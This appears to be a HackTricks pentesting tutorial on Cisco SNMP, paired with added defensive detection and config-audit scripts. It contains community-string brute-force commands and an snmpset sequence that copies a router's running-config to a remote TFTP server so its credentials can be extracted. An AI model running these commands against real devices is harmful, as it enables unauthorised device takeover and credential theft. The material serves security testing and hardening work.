# Cisco SNMP

{{#include ../../banners/hacktricks-training.md}}

## Pentesting Cisco Networks

**SNMP** functions over UDP with ports **161/UDP** for general messages and **162/UDP** for trap messages. This protocol relies on *community strings*, which serve as plaintext "passwords" that authorise communication between SNMP agents and managers. These strings determine the access level, specifically **read-only (RO) or read-write (RW) permissions**.

A classic—yet still extremely effective—attack vector is to **brute-force community strings** in order to elevate from unauthenticated user to device administrator (RW community). A practical tool for this task is [**onesixtyone**](https://github.com/trailofbits/onesixtyone):

```bash
onesixtyone -c community_strings.txt -i targets.txt
```

Other fast options are the Nmap NSE script `snmp-brute` or Hydra's SNMP module:

```bash
nmap -sU -p161 --script snmp-brute --script-args snmp-brute.communitiesdb=wordlist 10.0.0.0/24
hydra -P wordlist.txt -s 161 10.10.10.1 snmp
```

---

### Dumping configuration through SNMP (CISCO-CONFIG-COPY-MIB)

If you obtain an **RW community** you can copy the running-config/startup-config to a TFTP/FTP server *without CLI access* by abusing the CISCO-CONFIG-COPY-MIB (`1.3.6.1.4.1.9.9.96`). Two common approaches are:

1. **Nmap NSE – `snmp-ios-config`**

   ```bash
   nmap -sU -p161 --script snmp-ios-config \
     --script-args creds.snmp=private 192.168.66.1
   ```

   The script automatically orchestrates the copy operation and prints the configuration to stdout.

2. **Manual `snmpset` sequence**

   ```bash
   # Copy running-config (4) to a TFTP server (1); 1234 is a random, one-shot row id.
   # Columns of ccCopyEntry (1.3.6.1.4.1.9.9.96.1.1.1.1.<column>.<row>):
   #    2 = ccCopyProtocol        (1 = tftp)
   #    3 = ccCopySourceFileType  (4 = runningConfig)
   #    4 = ccCopyDestFileType    (1 = networkFile)
   #    5 = ccCopyServerAddress   (TFTP server IP)
   #    6 = ccCopyFileName        (file name written on the server)
   #   14 = ccCopyEntryRowStatus  (4 = createAndGo)
   snmpset -v2c -c private 192.168.66.1 \
     1.3.6.1.4.1.9.9.96.1.1.1.1.2.1234 i 1 \
     1.3.6.1.4.1.9.9.96.1.1.1.1.3.1234 i 4 \
     1.3.6.1.4.1.9.9.96.1.1.1.1.4.1234 i 1 \
     1.3.6.1.4.1.9.9.96.1.1.1.1.5.1234 a 10.10.14.8 \
     1.3.6.1.4.1.9.9.96.1.1.1.1.6.1234 s "backup.cfg" \
     1.3.6.1.4.1.9.9.96.1.1.1.1.14.1234 i 4
   ```

   Row identifiers are *one-shot*; reusing one within five minutes triggers `inconsistentValue` errors.

Once the file is on your TFTP server you can inspect credentials (`enable secret`, `username secret`, etc.) or even push a modified config back to the device.

---

### Metasploit goodies

* **`cisco_config_tftp`** – downloads running-config/startup-config via TFTP after abusing the same MIB.
* **`snmp_enum`** – collects device inventory information, VLANs, interface descriptions, ARP tables, etc.

```bash
use auxiliary/scanner/snmp/snmp_enum
set RHOSTS 10.10.100.10
set COMMUNITY public
run
```

---

## Recent Cisco SNMP vulnerabilities (2023 – 2025)

Keeping track of vendor advisories is useful to scope *zero-day-to-n-day* opportunities inside an engagement:

| Year | CVE | Affected feature | Impact |
|------|-----|------------------|--------|
| 2025 | CVE-2025-20174 | SNMP subsystem | Crafted packet leads to authenticated *DoS* (reload) on IOS/IOS-XE (v1/v2c/v3). |
| 2024 | CVE-2024-20373 | IPv4 ACL handling | Mis-configured **extended** ACLs silently *fail*, allowing unauthenticated SNMP polling when a valid community/user is known. |
| 2025 | (no CVE yet) | SNMPv3 configuration restriction bypass | Valid v3 user can poll from addresses that should be denied. |

Exploitability often still depends on possessing the community string or v3 credentials—another reason why brute-forcing them remains relevant.
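The defender's counterpart to the community brute-forcing and the SNMP-driven config copy described above, added here as an example that is not part of the original page: a small Python detector run over syslog lines in the IOS `%SNMP-3-AUTHFAIL` and `%SYS-5-CONFIG_I ... by snmp` message formats. It raises one alert per new source that is not an approved management station, one when a source accumulates `threshold` authentication failures inside a sliding window (the brute-force signature), and one for every configuration change performed over SNMP from a non-approved source. The sample lines, the device name `rtr1`, the addresses, the allow-list, the threshold and the window are all constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample syslog lines in the IOS message format (hypothetical device "rtr1",
# not captured from a real network). 10.0.0.5 plays the legitimate NMS and 10.10.14.8
# the unexpected source.
SAMPLE_LOGS = """\
2025-01-01T10:00:00 rtr1 %SNMP-3-AUTHFAIL: Authentication failure for SNMP req from host 10.10.14.8
2025-01-01T10:00:03 rtr1 %SNMP-3-AUTHFAIL: Authentication failure for SNMP req from host 10.10.14.8
2025-01-01T10:00:06 rtr1 %SNMP-3-AUTHFAIL: Authentication failure for SNMP req from host 10.10.14.8
2025-01-01T10:00:09 rtr1 %SNMP-3-AUTHFAIL: Authentication failure for SNMP req from host 10.10.14.8
2025-01-01T10:00:12 rtr1 %SNMP-3-AUTHFAIL: Authentication failure for SNMP req from host 10.10.14.8
2025-01-01T10:03:00 rtr1 %SNMP-3-AUTHFAIL: Authentication failure for SNMP req from host 10.0.0.5
2025-01-01T10:06:00 rtr1 %SYS-5-CONFIG_I: Configured from 10.10.14.8 by snmp
2025-01-01T10:07:00 rtr1 %SYS-5-CONFIG_I: Configured from 10.0.0.5 by snmp
2025-01-01T10:08:00 rtr1 %SYS-5-CONFIG_I: Configured from console by vty0 (10.0.0.5)
"""

# <ISO timestamp> <device> <%FACILITY-SEV-MNEMONIC: text>
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<device>\S+)\s+(?P<msg>%\S+:\s.*)$")
AUTHFAIL_RE = re.compile(r"%SNMP-3-AUTHFAIL: .*from host (?P<src>\d+\.\d+\.\d+\.\d+)")
SNMPCFG_RE = re.compile(r"%SYS-5-CONFIG_I: Configured from (?P<src>\d+\.\d+\.\d+\.\d+) by snmp")


def parse_line(line):
    """Return (timestamp, device, kind, source_ip) for SNMP-relevant lines, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.fromisoformat(m["ts"])
    a = AUTHFAIL_RE.search(m["msg"])
    if a:
        return ts, m["device"], "authfail", a["src"]
    c = SNMPCFG_RE.search(m["msg"])
    if c:
        return ts, m["device"], "config_via_snmp", c["src"]
    return None  # CLI config changes and everything else are ignored here


def detect(log_text, allowed_managers, threshold=5, window=timedelta(seconds=60)):
    """Apply the three rules over syslog text and return a list of alert dicts."""
    allowed = set(allowed_managers)
    recent = defaultdict(deque)   # src -> timestamps of AUTHFAILs inside the window
    brute_alerted = set()         # alert once per source, not once per packet
    seen_unexpected = set()
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        ts, device, kind, src = ev
        if src not in allowed and src not in seen_unexpected:
            seen_unexpected.add(src)
            alerts.append({"rule": "unexpected_source", "src": src, "device": device, "ts": ts})
        if kind == "authfail":
            q = recent[src]
            q.append(ts)
            while q and ts - q[0] > window:   # slide the window forward
                q.popleft()
            if len(q) >= threshold and src not in brute_alerted:
                brute_alerted.add(src)
                alerts.append({"rule": "community_bruteforce", "src": src, "device": device,
                               "ts": ts, "count": len(q)})
        elif kind == "config_via_snmp" and src not in allowed:
            alerts.append({"rule": "config_change_via_snmp", "src": src, "device": device, "ts": ts})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOGS, {"10.0.0.5"}):
        print(alert)
```

The brute-force rule deliberately ignores the allow-list: an approved management station cycling through wrong community strings is just as worth a look as an unknown host doing it. Feeding the function a real syslog export needs only the timestamp format in `LINE_RE` adjusted to what the collector writes; the `ccmHistoryEventConfigSource` objects mentioned in the hardening tips carry the same "configured via SNMP" signal for devices that are polled rather than logged.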
---

## Hardening & Detection tips

* Upgrade to a fixed IOS/IOS-XE version (see the Cisco advisory for each CVE above).
* Prefer **SNMPv3** with `authPriv` (SHA-256/AES-256) over v1/v2c.

  ```
  snmp-server group SECURE v3 priv
  snmp-server user monitor SECURE v3 auth sha <auth-password> priv aes 256 <priv-password>
  ```

* Bind SNMP to a management VRF and **restrict with *standard* numbered IPv4 ACLs** (extended named ACLs are risky – CVE-2024-20373).
* Disable **RW communities**; if operationally required, limit them with an ACL and a view: `snmp-server community <rw-string> view SysView RW 99`
* Monitor for:
  - UDP/161 spikes or unexpected sources (SIEM rules).
  - `CISCO-CONFIG-MAN-MIB::ccmHistoryEventConfigSource` events indicating out-of-band config changes.
* Enable **SNMPv3 logging** and `snmp-server packetsize 1500` to reduce certain DoS vectors.

---

## References

- Cisco: *How To Copy Configurations To and From Cisco Devices Using SNMP*
- Cisco Security Advisory *cisco-sa-snmp-uwBXfqww* (CVE-2024-20373)

{{#include ../../banners/hacktricks-training.md}}
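An added example, not part of the original page, that turns the hardening list above into a check you can run against a `show running-config` dump: it flags v1/v2c communities, RW communities, communities with no ACL, extended ACLs applied to SNMP (the CVE-2024-20373 pattern) and SNMPv3 groups below `priv`. The sample configuration, the device name `rtr1`, the addresses and the wording of the findings are constructed assumptions; the numbered-ACL ranges are the IOS standard ranges (1–99 and 1300–1999), and any other number is treated as extended.

```python
import re

# Constructed sample running-config excerpt (hypothetical device; not from a real network).
SAMPLE_CONFIG = """\
hostname rtr1
!
ip access-list extended NMS-EXT
 permit udp host 10.0.0.5 any eq snmp
!
access-list 99 permit 10.0.0.5
!
snmp-server community public RO
snmp-server community private RW NMS-EXT
snmp-server community n3tmon view SysView RO 99
snmp-server group LEGACY v3 noauth
snmp-server group SECURE v3 priv access 99
snmp-server packetsize 1500
"""

# IOS standard numbered ACL ranges; everything else numeric is treated as extended.
STANDARD_NUMBERED = set(range(1, 100)) | set(range(1300, 2000))


def _acl_kind(acl, extended_named, standard_named):
    """Classify an ACL reference as 'standard', 'extended' or 'unknown'."""
    if acl.isdigit():
        return "standard" if int(acl) in STANDARD_NUMBERED else "extended"
    if acl in extended_named:
        return "extended"
    if acl in standard_named:
        return "standard"
    return "unknown"


def _check_acl(acl, who, extended_named, standard_named, findings):
    kind = _acl_kind(acl, extended_named, standard_named)
    if kind == "extended":
        findings.append((who, f"ACL {acl} is extended; use a standard numbered ACL (CVE-2024-20373)"))
    elif kind == "unknown":
        findings.append((who, f"ACL {acl} is not defined in this config"))


def audit_snmp(config_text):
    """Return a list of (object, finding) tuples for weak SNMP settings."""
    # First pass: learn which named ACLs are extended and which are standard.
    extended_named, standard_named = set(), set()
    for line in config_text.splitlines():
        m = re.match(r"ip access-list (extended|standard) (\S+)", line)
        if m:
            (extended_named if m[1] == "extended" else standard_named).add(m[2])

    findings = []
    for line in config_text.splitlines():
        tok = line.split()
        if tok[:2] == ["snmp-server", "community"] and len(tok) > 2:
            name, rest = tok[2], tok[3:]
            opts, i = [], 0
            while i < len(rest):            # drop 'view <name>' and 'ipv6 <acl>' option pairs
                if rest[i].lower() in ("view", "ipv6"):
                    i += 2
                    continue
                opts.append(rest[i])
                i += 1
            perms = [o for o in opts if o.upper() in ("RO", "RW")]
            acls = [o for o in opts if o.upper() not in ("RO", "RW")]
            findings.append((name, "v1/v2c community in use; prefer SNMPv3 authPriv"))
            if any(p.upper() == "RW" for p in perms):
                findings.append((name, "RW community; remove it or restrict with ACL and view"))
            if not acls:
                findings.append((name, "community has no ACL"))
            else:
                _check_acl(acls[0], name, extended_named, standard_named, findings)
        elif tok[:2] == ["snmp-server", "group"] and "v3" in tok:
            name = tok[2]
            v3 = tok.index("v3")
            level = tok[v3 + 1] if v3 + 1 < len(tok) else "?"
            if level != "priv":
                findings.append((name, f"v3 group security level '{level}'; require priv"))
            if "access" in tok and tok.index("access") + 1 < len(tok):
                _check_acl(tok[tok.index("access") + 1], name, extended_named, standard_named, findings)
    return findings


if __name__ == "__main__":
    for obj, msg in audit_snmp(SAMPLE_CONFIG):
        print(f"{obj}: {msg}")
```

Run against the sample it reports seven findings: `public` (v1/v2c, no ACL), `private` (v1/v2c, RW, extended ACL), `n3tmon` (v1/v2c only, since it is RO and bound to standard ACL 99) and `LEGACY` (`noauth`); the `SECURE` group passes. Pipe in the output of `show running-config | include snmp-server|access-list` from each device to get the same report fleet-wide.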